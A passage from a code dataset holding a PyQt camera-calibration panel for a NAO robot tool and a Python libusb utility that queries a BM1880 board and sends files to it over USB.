dataSet[1][1])\n rect = qtc.QRectF(qtc.QPointF(\n proj_pt[0], proj_pt[1]), qtc.QSizeF(4, 4))\n painter.drawText(qtc.QPointF(\n proj_pt[0]+5, proj_pt[1]+5), str(dataSet[0]))\n painter.fillRect(rect, colour)\n painter.end()\n\n def saveCapturesToFile(self):\n options = qtw.QFileDialog.Options()\n options |= qtw.QFileDialog.DontUseNativeDialog\n fileName, _ = qtw.QFileDialog.getSaveFileName(\n self, \"QFileDialog.getSaveFileName()\", \"\", \"All Files (*);;JSON Files (*.json)\", options=options)\n if fileName:\n self.calibrator.captureDataToJsonFile(fileName)\n\n def setMotionSequenceState(self, val=0):\n if val > 0:\n self.motionSeqState = val\n if (not self.btnStopMotion.isEnabled()) or self.btnPlayMotionSeq.isEnabled():\n self.btnStopMotion.setEnabled(True)\n self.btnPlayMotionSeq.setEnabled(False)\n else:\n self.motionSeqState = 0\n self.motionSeqIndex = 0\n self.elapsedTime = 0\n if self.btnStopMotion.isEnabled() or (not self.btnPlayMotionSeq.isEnabled()):\n self.btnStopMotion.setEnabled(False)\n self.btnPlayMotionSeq.setEnabled(True)\n\n def setCalib(self, val: bool = False):\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"is_cam_calib\"], bool(val))\n\n def moveRobot(self, pitch: float, yaw: float, torso_rotV: list = [], torso_posV: list = []):\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], \"useEffectiveYawVelocity\", False)\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"head_yaw_key\"], yaw)\n self.setConfig(\n Main.CALIB_BEHAVIOR_CFG[\"mount\"], Main.CALIB_BEHAVIOR_CFG[\"head_pitch_key\"], pitch)\n\n # TODO FUTURE set torso movements\n\n def trigger(self, val: n_cam.CamSelect = n_cam.CamSelect.BOTH):\n if val == n_cam.CamSelect.BOTH:\n self.trigger_state[n_cam.TOP] = True\n self.trigger_state[n_cam.BOTTOM] = True\n elif val == n_cam.CamSelect.TOP:\n self.trigger_state[n_cam.TOP] = True\n self.trigger_state[n_cam.BOTTOM] = False\n elif val == n_cam.CamSelect.BOTTOM:\n self.trigger_state[n_cam.TOP] = False\n self.trigger_state[n_cam.BOTTOM] = True\n else:\n self.trigger_state[n_cam.TOP] = False\n self.trigger_state[n_cam.BOTTOM] = False\n\n def capture(self):\n '''\n Take a snapshot.\n 1. Image\n 2. Kinematic Matrices\n torso2gnd\n head2torso\n cam2gnd\n 3. FUTURE - Joint angles\n '''\n self.captureFlag = True\n\n # rising edge\n self.trigger(n_cam.CamSelect.BOTH)\n\n def startCalib(self):\n if not self.currentConfig:\n msg = qtw.QMessageBox()\n msg.setIcon(qtw.QMessageBox.Warning)\n msg.setText(\n \"Existing Projection config is not sent from NAO yet. Want to proceed?\")\n msg.setWindowTitle(\"Config Not set\")\n msg.setStandardButtons(qtw.QMessageBox.Yes | qtw.QMessageBox.No)\n msg.setDefaultButton(qtw.QMessageBox.No)\n msg.setEscapeButton(qtw.QMessageBox.No)\n\n if msg.exec_() == qtw.QMessageBox.No:\n self.updateStatusLabel(\"Calibration Cancelled\")\n return\n\n self.calibrator.updateConfiguration(self.currentConfig)\n enableSaveAndExport = False\n\n self.btnCalibrate.setEnabled(False)\n self.resultWidget.hide()\n self.btnShowResults.setEnabled(False)\n\n self.checkSaveTopInt.setChecked(False)\n self.checkSaveTopExt.setChecked(False)\n self.checkSaveBotInt.setChecked(False)\n self.checkSaveBotExt.setChecked(False)\n\n self.checkSaveTopInt.setEnabled(False)\n self.checkSaveTopExt.setEnabled(False)\n self.checkSaveBotInt.setEnabled(False)\n self.checkSaveBotExt.setEnabled(False)\n self.btnSave.setEnabled(enableSaveAndExport)\n self.btnExport.setEnabled(enableSaveAndExport)\n\n self.calibrator.settings.setFlags(self.checkBoxIntrinsicTop.isChecked(), self.checkBoxIntrinsicBottom.isChecked(\n ), self.checkBoxExtrinsicTop.isChecked(), self.checkBoxExtrinsicBottom.isChecked())\n\n output = self.calibrator.startCalibration()\n if output:\n prettyOut = {}\n if output.is_ext_done[n_cam.TOP]:\n self.checkSaveTopExt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.TOP_EXT] = output.results[n_result.TOP_EXT]\n if output.is_ext_done[n_cam.BOTTOM]:\n self.checkSaveBotExt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.BOTTOM_EXT] = output.results[n_result.BOTTOM_EXT]\n if output.is_int_done[n_cam.TOP]:\n self.checkSaveTopInt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.TOP_FC] = output.results[n_result.TOP_FC]\n prettyOut[n_result.TOP_CC] = output.results[n_result.TOP_CC]\n if output.is_int_done[n_cam.BOTTOM]:\n self.checkSaveBotInt.setEnabled(True)\n enableSaveAndExport = True\n prettyOut[n_result.BOTTOM_FC] = output.results[n_result.BOTTOM_FC]\n prettyOut[n_result.BOTTOM_CC] = output.results[n_result.BOTTOM_CC]\n\n self.results = output\n self.btnShowResults.setEnabled(True)\n self.btnSave.setEnabled(enableSaveAndExport)\n self.btnExport.setEnabled(enableSaveAndExport) \n self.txtResult.setPlainText(json.dumps(prettyOut, indent=2))\n self.updateStatusLabel(\"Calibration Complete\")\n else:\n self.updateStatusLabel(\"Calibration Failed\")\n\n self.btnCalibrate.setEnabled(True)\n\n def saveCalib(self):\n data = self.exportCalib()\n\n for key, value in data.items():\n self.setConfig(n_result.MOUNT, key, value)\n\n self.saveConfig()\n self.updateStatusLabel(\"Saved Results\")\n\n def exportCalib(self):\n output = self.results\n data = {}\n if output:\n if output.is_ext_done[n_cam.TOP] and self.checkSaveTopExt.isChecked():\n data[n_result.TOP_EXT] = output.results[n_result.TOP_EXT]\n if output.is_ext_done[n_cam.BOTTOM] and self.checkSaveBotExt.isChecked():\n data[n_result.BOTTOM_EXT] = output.results[n_result.BOTTOM_EXT]\n if output.is_int_done[n_cam.TOP] and self.checkSaveTopInt.isChecked():\n data[n_result.TOP_FC] = output.results[n_result.TOP_FC]\n data[n_result.TOP_CC] = output.results[n_result.TOP_CC]\n if output.is_int_done[n_cam.BOTTOM] and self.checkSaveBotInt.isChecked():\n data[n_result.BOTTOM_FC] = output.results[n_result.BOTTOM_FC]\n data[n_result.BOTTOM_CC] = output.results[n_result.BOTTOM_CC]\n return data\n\n def exportCalibToFile(self):\n data = self.exportCalib()\n currentConfig = copy.deepcopy(self.currentConfig)\n currentConfig.update(data)\n\n if currentConfig is None:\n return\n\n location = qtw.QFileDialog.getSaveFileName(\n self, \"Save file\",\n os.getcwd() + \"/../../etc/configuration/location/default/head/\" +\n n_result.MOUNT + \".json\")\n\n if location[0] == '':\n return\n\n try:\n with open(location[0], 'w') as f:\n json.dump(currentConfig, f, indent=4)\n f.write(\"\\n\")\n except Exception as e:\n logger.error(__name__ +\n \": Exception while saving config to file: \" +\n str(e))\n self.window().statusBar().showMessage(str(e))\n\n def updateStatusLabel(self, string: str):\n self.lblStatus.setText(string)\n\n def data_received(self, data: netutils.Data):\n if isinstance(data, nd.DebugValue):\n if data.key == Main.KIN_MATRIX_MOUNT:\n mat = data.data\n timestamp = data.timestamp\n\n # get camera from idenficiation string\n camera = list(n_cam.CAM_ENUM_TO_STR_MAP.keys())[list(n_cam.CAM_ENUM_TO_STR_MAP.values())\n .index(mat[\"imageInfos\"][\"identification\"])]\n\n torso_to_head = ImageWithKinematicData.naoDebugKinMatrixToAffine(mat[n_kinCap.getDataKeyString(\n n_kinCap.DataKey.TORSO_TO_HEAD)])\n ground_to_torso = ImageWithKinematicData.naoDebugKinMatrixToAffine(mat[n_kinCap.getDataKeyString(\n n_kinCap.DataKey.GROUND_TO_TORSO)])\n ground_to_cam = ImageWithKinematicData.naoDebugKinMatrixToAffine(\n mat[\"imageInfos\"][n_kinCap.getDataKeyString(n_kinCap.DataKey.GROUND_TO_CAM)])\n ground_to_cam[0:3, 3] *= 1000 # convert to mm\n\n curMatCap = self.cur_matrix_cap[camera]\n curMatCap.setValues(\n camera, timestamp, torso_to_head, ground_to_torso, ground_to_cam)\n self.cur_matrix_cap[camera] = curMatCap\n\n # print(\"l1T\", mat[\"ImageInfos\"][\"timestamp\"])\n if timestamp == self.cur_cam_img_data[camera].timestamp:\n logger.info(__name__ + \": Sync mat \" + str(camera))\n self.cur_cam_img_data[camera].kinematic_chain = copy.deepcopy(\n curMatCap)\n self.cur_cam_img_data[camera].is_kinematics_updated = True\n self.cur_cam_img_data[camera].isSynced = True\n\n else:\n logger.warning(\n __name__ + \": Unused debug value key: \" + data.key)\n\n if isinstance(data, nd.DebugImage):\n for camera in n_cam.CAMERAS:\n if data.key == Main.CAM_MOUNT[camera] and self.trigger_state[camera]:\n self.trigger_state[camera] = False\n self.cur_cam_img_data[camera].reset(data)\n if self.cur_matrix_cap[camera].timestamp == data.timestamp:\n self.cur_cam_img_data[camera].kinematic_chain = copy.deepcopy(\n self.cur_matrix_cap[camera])\n self.cur_cam_img_data[camera].is_kinematics_updated = True\n self.cur_cam_img_data[camera].isSynced = True\n logger.info(__name__ + \": Sync Img \" + str(camera))\n\n def update(self):\n '''\n Update UI and update capture array if new data is there.\n '''\n # Motion sequence playing\n\n if self.motionSeqState:\n if self.motionSeqState == 1:\n self.trigger(n_cam.CamSelect.BOTH)\n self.setMotionSequenceState(2)\n self.elapsedTime = 0\n\n elif self.motionSeqState == 2 and self.elapsedTime > self.motionDelay:\n # We got the images, now the next movement\n if self.motionSeqIndex < len(self.motionCommandList):\n idx = self.motionSeqIndex\n command = self.motionCommandList[idx]\n self.moveRobot(command['pitch'], command['yaw'])\n self.setMotionSequenceState(3)\n self.motionSeqIndex += 1\n else:\n self.setMotionSequenceState(0)\n self.updateStatusLabel(\"Capture Sequence Done\")\n\n elif self.motionSeqState == 3 and \\\n self.elapsedTime > (self.motionDelay + self.captureDelay):\n # Movement should be done by now, start the next cycle\n self.setMotionSequenceState(1)\n self.trigger(n_cam.CamSelect.NONE)\n\n self.elapsedTime += self.updateInterval\n\n # Image updates\n\n # Due to preprocessing times, the timer has to be stopped until processing is done.\n # The idea is similar to stopping interrupts in an interrupt routine.\n isStopTimer = False\n\n for camera in n_cam.CAMERAS:\n curImgData = self.cur_cam_img_data[camera]\n if curImgData.is_img_dat_updated:\n # startTime = time.perf_counter()\n\n pixmap = qtg.QPixmap()\n curImgData.loadToPixMap(pixmap)\n\n if curImgData.is_kinematics_updated:\n # stop timer\n if not isStopTimer:\n self.timer.stop()\n isStopTimer = True\n\n # Process and get calib feature points\n count = self.calibrator.processCapture(\n curImgData.getNaoCapData(), curImgData.data)\n # Update UI labels and update button states\n self.enableDisableCalibButton()\n self.updateStatusLabel(\n \"Snapshots captured top: \"+str(count[0])+\", bottom: \"+str(count[1]))\n\n if self.calibrator.capture_data[camera]:\n\n cap_data = self.calibrator.capture_data[camera][-1]\n projectedBoardPoints = self.calibrator.projectBoardPoints(\n cap_data, self.calibrator.camerasProperties[camera])\n\n self.drawMarkers(\n pixmap, projectedBoardPoints, qtc.Qt.yellow)\n\n if self.results and self.results.is_ext_done[camera]:\n projectedBoardPoints = self.calibrator.projectBoardPoints(\n cap_data, self.calibrator.camerasProperties[camera], self.results.getExt(camera))\n self.drawMarkers(\n pixmap, projectedBoardPoints, qtc.Qt.green)\n\n if camera == n_cam.TOP:\n self.canvasTopCam.setMinimumSize(1, 1)\n self.canvasTopCam.setPixmap(\n pixmap.scaled(self.canvasTopCam.width(), self.canvasTopCam.height(), qtc.Qt.KeepAspectRatio))\n elif camera == n_cam.BOTTOM:\n self.canvasBottomCam.setMinimumSize(1, 1)\n self.canvasBottomCam.setPixmap(\n pixmap.scaled(self.canvasBottomCam.width(),\n self.canvasBottomCam.height(), qtc.Qt.KeepAspectRatio))\n if isStopTimer:\n self.timer.start(self.frame_rate)\n\n #### Config related ####\n\n def saveConfig(self):\n if self.nao.is_connected():\n self.nao.config_protocol.save()\n\n def setConfig(self, mount: str, key: str, value: str):\n if self.nao.is_connected():\n self.nao.config_protocol.set(mount, key, value)\n\n def subscribeConfig(self, key: str, force=False):\n if self.nao.is_connected():\n self.nao.config_protocol.subscribe(\n key,\n self.objectName(),\n lambda d: self.update_config_signal.emit(d))\n\n #### Other events ####\n def closeEvent(self, event):\n if self.nao.is_connected():\n self.trigger(n_cam.CamSelect.BOTH)\n self.setCalib(False)\n self.unsubscribe()\n self.timer.stop()\n self.deleteLater()\n super(Main, self).closeEvent(event)\n","sub_path":"tools/mate/mate/ui/panels/camera_calib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141043141","text":"#!/usr/local/bin/python\nfrom array import array\nimport bm_usb_util.bm_usb_pkt as pkt\nimport os\nimport platform\nimport re\nimport sys\nimport time\nimport usb.core\nimport usb.util\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nclass bm_usb_libusb:\n # Table of CRC constants - implements x^16+x^12+x^5+1\n crc16_tab = [\n 0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,\n 0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,\n 0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,\n 0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,\n 0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,\n 0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,\n 0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,\n 0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,\n 0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,\n 0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,\n 0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,\n 0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,\n 0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,\n 0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,\n 0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,\n 0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,\n 0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,\n 0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,\n 0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,\n 0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,\n 0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,\n 0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,\n 0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,\n 0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,\n 0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,\n 0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,\n 0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,\n 0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,\n 0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,\n 0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,\n 0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,\n 0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,\n ]\n\n def crc16_ccitt(self, HexData):\n cksum = int(\"0\", 16)\n for i in range(len(HexData)):\n cksum = self.crc16_tab[((cksum >> 8) ^ HexData[i]) & 0xff] ^ ((cksum << 8) & 0xff00)\n return cksum\n\n def close_device(self):\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n Found = -1\n i = 0\n while Found == -1:\n i = i + 1\n sys.stdout.write(\"Waiting for re-connect: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n if self.device is not None:\n try:\n active = self.device.is_kernel_driver_active(1)\n if active is False:\n try:\n self.device.attach_kernel_driver(1)\n print(\"attach kernel driver\\n\")\n return\n except usb.USBError as e:\n time.sleep(0.05)\n continue\n else:\n break\n except usb.USBError as e:\n if '[Errno 19]' in str(e):\n # device is no longer connected\n return\n else:\n print(\"get acitve err %s\\n\" %(e))\n time.sleep(0.05)\n continue \n else:\n print(\"close a non-open device. \\n\")\n break\n\n def get_vid(self, vid_pid):\n vid = vid_pid.replace('VID:PID=', \"\")\n vid = vid.split(':', 1)[0]\n return int(vid, 16)\n\n def get_pid(self, vid_pid):\n pid = vid_pid.replace('VID:PID=', \"\")\n pid = pid.split(':', 1)[1]\n return int(pid, 16)\n\n def libusb_query(self, vid_pid_list, timeout=0, location=None):\n if location is not None:\n self.location = location\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n found = -1\n self.device = None\n i = 0\n query_time = time.time()\n while(found == -1):\n i = i + 1\n sys.stdout.write(\"Waiting for BM1880 USB port: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n t_bus = None\n t_port_numbers = None\n if self.location is not None:\n t_bus = int(self.location.split('-')[0])\n t_port_numbers = self.location.split('-')[-1].split('.')\n t_port_numbers = tuple([int(j) for j in t_port_numbers])\n for vid_pid in vid_pid_list:\n if self.location is not None:\n self.device = usb.core.find(idVendor=self.get_vid(vid_pid),\n idProduct=self.get_pid(vid_pid), bus=t_bus, port_numbers=t_port_numbers)\n else:\n self.device = usb.core.find(idVendor=self.get_vid(vid_pid), idProduct=self.get_pid(vid_pid))\n if self.device is not None:\n # found = 1\n time.sleep(1)\n self.dev_backend = self.device.backend\n break\n if self.device is None:\n if timeout != 0 and ((time.time() - query_time) > timeout):\n sys.stdout.write(\"Query device timeout!\\n\" )\n sys.stdout.flush()\n sys.exit(-1)\n time.sleep(0.05)\n else:\n try:\n cfg = self.device.get_active_configuration()\n except (NotImplementedError, usb.USBError):\n if timeout != 0 and ((time.time() - query_time) > timeout):\n sys.stdout.write(\"Query device timeout!\\n\" )\n sys.stdout.flush()\n sys.exit(-1)\n else:\n sys.stdout.write(\"Waiting for LibUSB hooked: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n time.sleep(0.05)\n continue\n except usb.USBError as e:\n continue\n found = 1\n # detach the linux kernel driver.\n osName = platform.system()\n if osName == 'Linux':\n if self.device.is_kernel_driver_active(1) is True:\n self.device.detach_kernel_driver(1)\n elif osName == 'Windows':\n sys.stdout.write(\"LIBUSB on %s \\n\" %(osName))\n sys.stdout.flush()\n else:\n sys.stdout.write(\"Cannot support OS %s\\n\" %(osName))\n sys.stdout.flush()\n sys.exit(-1)\n \n intf = cfg[(0,0)]\n self.epOut = usb.util.find_descriptor(\n intf,\n # match the first OUT endpoint\n custom_match = \\\n lambda e: \\\n usb.util.endpoint_direction(e.bEndpointAddress) == \\\n usb.util.ENDPOINT_OUT)\n self.epIn = usb.util.find_descriptor(\n intf,\n # match the first OUT endpoint\n custom_match = \\\n lambda e: \\\n usb.util.endpoint_direction(e.bEndpointAddress) == \\\n usb.util.ENDPOINT_IN)\n return self.device\n\n def libusb_write(self, command, recv_ack, delay_ms):\n start_time = time.time()\n write_len = -1;\n try:\n write_len = self.epOut.write(command, 5000)\n except usb.USBError as e:\n print (\"Write error\" + e)\n \n return write_len\n\n def usb_send_file(self, filename, dest_addr, delay_ms):\n self.ioTime = 0\n start_time = time.time()\n complete_cnt = 0\n while (complete_cnt < 1): # For stress test\n complete_cnt = complete_cnt + 1\n last_pos = 0\n tx_len = 1048576\n content_file = open(filename, 'rb')\n content_size = os.path.getsize(filename)\n print (\"%s is %d bytes\" % (filename, content_size))\n print (\"Send to address 0x%x\" % dest_addr)\n\n while (content_size > 0):\n del self.data[:]\n content_file.seek(last_pos)\n if (content_size < tx_len):\n self.data.fromfile(content_file, content_size)\n tx_len = content_size\n else:\n self.data.fromfile(content_file, tx_len)\n last_pos = content_file.tell()\n\n send_len = self.libusb_write(self.data, 1, delay_ms)\n\n if send_len >= 0:\n dest_addr += send_len\n content_size -= send_len\n last_pos = last_pos - tx_len + send_len\n else:\n print (\"IO error, stop send file\")\n break\n # print (\"complete_cnt %d\" % complete_cnt)\n print (\"--- %s Seconds ---\" % round(time.time() - start_time, 2 ))\n # print (\"--- %s Seconds ---\" % str(self.ioTime))\n return\n\n def _usb_send_req(self, command, recv_ack, delay_ms):\n start_time = time.time()\n try:\n self.epOut.write(command, timeout=0)\n except usb.USBError as e:\n print (\"Write data timeout: %s\\n\", e)\n \n self.ioTime = self.ioTime + (time.time() - start_time)\n\n if recv_ack == 1:\n cmd_crc = self.crc16_ccitt(command)\n # print (\"cmd_crc %x\" % cmd_crc)\n\n start_time = time.time()\n try:\n rsp = self.epIn.read(16, timeout=0);\n except usb.USBError as e:\n print (\"Read ACK timeout\")\n self.ioTime = self.ioTime + (time.time() - start_time)\n ret_crc = (rsp[2])*256 + (rsp[3])\n #print (\"ret_crc %x\" % ret_crc)\n\n if ret_crc == cmd_crc:\n return rsp\n else:\n print (\"ACK_CRC_ERROR\")\n return\n else:\n return\n\n def usb_send_req_data(self, token, address, reqLen, ack, data=None):\n del self.ser_cmd[:]\n self.ser_cmd.append(token) # command\n self.ser_cmd.append(0) # high byte of packet size\n self.ser_cmd.append(reqLen) # low byte of packet size\n self.ser_cmd.append((address >> 32) & 0xFF) # 5 bytes for destination address\n self.ser_cmd.append((address >> 24) & 0xFF)\n self.ser_cmd.append((address >> 16) & 0xFF)\n self.ser_cmd.append((address >> 8) & 0xFF)\n self.ser_cmd.append((address & 0xFF))\n if data is not None:\n self.ser_cmd = self.ser_cmd + data\n if ack != 0:\n return self._usb_send_req(self.ser_cmd, 1, 0)\n else:\n return self.libusb_write(self.ser_cmd, 0, 0)\n\n def usb_send_req_kernel(self, token, reqLen, file_name, ack):\n del self.ser_cmd[:]\n self.ser_cmd.append(token) # command\n #ser_cmd.append(0) # high byte of packet size\n self.ser_cmd.append((reqLen >> 32) & 0xFF) # 5 bytes for destination address\n self.ser_cmd.append((reqLen >> 24) & 0xFF)\n self.ser_cmd.append((reqLen >> 16) & 0xFF)\n self.ser_cmd.append((reqLen >> 8) & 0xFF)\n self.ser_cmd.append((reqLen & 0xFF))\n #file_name_List = list(file_name)\n self.ser_cmd.fromstring(file_name)\n if ack != 0:\n return self._usb_send_req(self.ser_cmd, 1, 0)\n else:\n return self.libusb_write(self.ser_cmd, 0, 0)\n\n def protocol_msg_send(self, message, length, response):\n start_time = time.time()\n try:\n self.epOut.write(message, timeout=0)\n except usb.USBError as e:\n print (\"Write data fail!\")\n return pkt.FAIL\n self.ioTime = self.ioTime + (time.time() - start_time) \n\n if response == 1:\n start_time = time.time()\n try:\n ret = self.epIn.read(16);\n except usb.USBError as e:\n print (\"message response fail\")\n self.ioTime = self.ioTime + (time.time() - start_time)\n\n cmd_crc = self.crc16_ccitt(message)\n # print (\"cmd_crc %x\" % cmd_crc) \n \n ret_crc = (ret[pkt.RSP_CRC16_HI_OFFSET])*256 + (ret[pkt.RSP_CRC16_LO_OFFSET])\n #print (\"ret_crc %x\" % ret_crc)\n\n if ret_crc == cmd_crc:\n if message[pkt.MSG_TOKEN_OFFSET] != ret[pkt.RSP_TOKEN_OFFSET]:\n sys.stdout.write(\"Token: exp 0x%x get 0x%x\\n\" % (message[pkt.MSG_TOKEN_OFFSET], ret[pkt.RSP_TOKEN_OFFSET]))\n sys.stdout.flush()\n return pkt.SUCCESS\n else:\n sys.stdout.write(\"ACK_CRC_ERROR\")\n sys.stdout.flush()\n return pkt.FAIL\n else:\n return pkt.SUCCESS\n\n def protocol_msg_fill_header(self, message, token, addr, reqLen, dataSize):\n message.append(token) # command\n message.append((reqLen >> 8) & 0xFF) # high byte of packet size\n message.append(reqLen & 0xFF) # low byte of packet size\n message.append((addr >> 32) & 0xFF) # 5 bytes for destination address\n message.append((addr >> 24) & 0xFF)\n message.append((addr >> 16) & 0xFF)\n message.append((addr >> 8) & 0xFF)\n message.append((addr & 0xFF))\n if dataSize != 0:\n message.append((dataSize & 0xFF))\n message.append((dataSize >> 8 & 0xFF))\n message.append((dataSize >> 16 & 0xFF))\n message.append((dataSize >> 24 & 0xFF))\n message.append((dataSize >> 32 & 0xFF))\n message.append((dataSize >> 40 & 0xFF))\n message.append((dataSize >> 48 & 0xFF))\n message.append((dataSize >> 56 & 0xFF))\n return\n\n def protocol_usb_write(self, dataBuf):\n try:\n self.epOut.write(dataBuf, timeout=0)\n except usb.USBError as e:\n print (\"Write data Fail %s\" %e)\n return pkt.FAIL\n return pkt.SUCCESS\n\n def protocol_msg_s2d_once(self, addr, dataBuf, length):\n msg = []\n self.protocol_msg_fill_header(msg, BM_USB_S2D, addr, USB_MSG_S2D_SIZE, length)\n if self.protocol_msg_send(msg, USB_MSG_S2D_SIZE, 1) == FAIL:\n return pkt.FAIL\n else:\n return self.protocol_usb_write(dataBuf)\n\n def protocol_send_file(self, filename, dest_addr):\n complete_cnt = 0\n while (complete_cnt < 1): # For stress test\n tmp_addr = dest_addr\n self.ioTime = 0\n start_time = time.time()\n\n complete_cnt = complete_cnt + 1\n last_pos = 0\n tx_len = USB_BULK_MAX_SIZE\n content_file = open(filename, 'rb')\n content_size = os.path.getsize(filename)\n file_size = content_size\n print (\"%s is %d bytes\" % (filename, content_size))\n print (\"Send to address 0x%x\" % tmp_addr)\n\n while (content_size > 0):\n del self.data[:]\n\n content_file.seek(last_pos)\n if (content_size < tx_len):\n self.data.fromfile(content_file, content_size)\n tx_len = content_size\n else:\n self.data.fromfile(content_file, tx_len)\n last_pos = content_file.tell()\n \n send_ok = self.protocol_msg_s2d_once(tmp_addr, self.data, tx_len)\n\n if send_ok == 0:\n tmp_addr += tx_len\n content_size -= tx_len\n sys.stdout.write(\"[Working] %d%% \\r\" % (((file_size - content_size) * 100) / file_size))\n sys.stdout.flush() \n else:\n last_pos -= tx_len\n\n # print (\"complete_cnt %d\" % complete_cnt)\n print (\"--- %s Seconds ---\" % round(time.time() - start_time, 2 ))\n print (\"--- %s Seconds ---\" % str(self.ioTime))\n return\n\n def wait_for_reconnect(self, cnt_seconed):\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n while cnt_seconed > 0:\n cnt_seconed = cnt_seconed - 1\n sys.stdout.write(\"Waiting for re-connect: %s \\r\" % (progress_symbol[cnt_seconed%len(progress_symbol)]))\n sys.stdout.flush()\n time.sleep(1)\n\n def vidpid_string(self, vid_str, pid_str):\n vid_str = vid_str.replace(\"0x\", \"\")\n pid_str = pid_str.replace(\"0x\", \"\")\n while len(vid_str) < 4:\n vid_str = '0' + vid_str\n while len(pid_str) < 4:\n pid_str = '0' + pid_str\n verify_vidpid = verify_vidpid + vid_str + ':' + pid_str\n\n def usb_emmc_dl_verify(self, vid_pid_list, timeout):\n print(\"verify id = %s\" % vid_pid_list)\n if self.emmc_timeout == 0:\n query_timeout = timeout\n else:\n query_timeout = self.emmc_timeout\n # print(\"emmc_timeout = %s s\" % self.emmc_timeout)\n # print(\"query_timeout = %s s\" % query_timeout)\n self.libusb_query(vid_pid_list, query_timeout)\n\n def show_usage(self):\n sys.stdout.write(\"usage- python [script] vvid=[vid] vpid=[pid]\\n\") \n sys.stdout.write(\" [script] : %s \\n\" %__file__)\n sys.stdout.write(\" [vvid] : reconnect vid if emmc dl complete check enable \\n\")\n sys.stdout.write(\" [vpid] : reconnect pid if emmc dl complete check enable \\n\")\n sys.stdout.write(\" [timeout]: verify timeout (second) from emmc programming to kerel start \\n\") \n sys.stdout.write(\" 0 means wait forever (default) \\n\")\n sys.stdout.flush() \n\n def parse_arg(self):\n vid = ''\n pid = ''\n for i in range(1, len(sys.argv)):\n if 'vvid' in sys.argv[i]:\n vid = sys.argv[i]\n vid = vid.replace('vvid=', '')\n if 'vpid' in sys.argv[i]:\n pid = sys.argv[i]\n pid = pid.replace('vpid=', '') \n if 'timeout' in sys.argv[i]:\n s = sys.argv[i]\n s = s.replace('timeout=', \"\")\n self.emmc_timeout = int(s)\n print(\"emmc timeout = %d s\" % self.emmc_timeout)\n if 'location' in sys.argv[i]:\n self.location = sys.argv[i]\n self.location = 